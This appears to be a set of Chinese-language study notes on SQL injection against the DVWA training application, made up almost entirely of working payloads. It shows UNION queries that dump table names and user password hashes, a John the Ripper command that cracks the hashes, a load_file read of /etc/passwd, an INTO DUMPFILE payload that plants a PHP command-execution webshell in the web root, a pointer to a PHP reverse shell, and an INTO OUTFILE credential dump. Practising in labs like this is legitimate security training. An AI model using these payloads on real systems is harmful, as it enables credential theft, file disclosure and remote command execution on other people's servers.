1. 複雜語句查詢
' union select //閉合前面的分號,聯合查詢
' union select table_name,table_schema from information_schema.tables--+ // --註釋符 +空格
' union select user,password from dvwa.users--+ //查詢user、password列內容
' union select null, concat(user,0x3a,password) from users--+ //查詢user、password列內容
john --format=raw-MD5 dvwa.txt //密碼用MD5 hash算法還原
2. 讀寫文件
讀:' union select null, load_file('/etc/passwd')--+
寫:上傳webshell
' union select null, "<?php passthru($_GET['cmd']);?>" INTO DUMPFILE" /var/www/a.php" --+
php-reverse-shell.php | xxd -ps | tr -d '\n' //或換成php反彈shell
3. 下載數據庫
注意OUTFILE與DUMPFILE區別,OUTFILE將數據庫數據傳到指定文件,DUMPFILE將要上傳的數據傳到指定文件
' union select null, concat(user,0x3a,password) from users INTO OUTFILE '/tmp/a.db'--+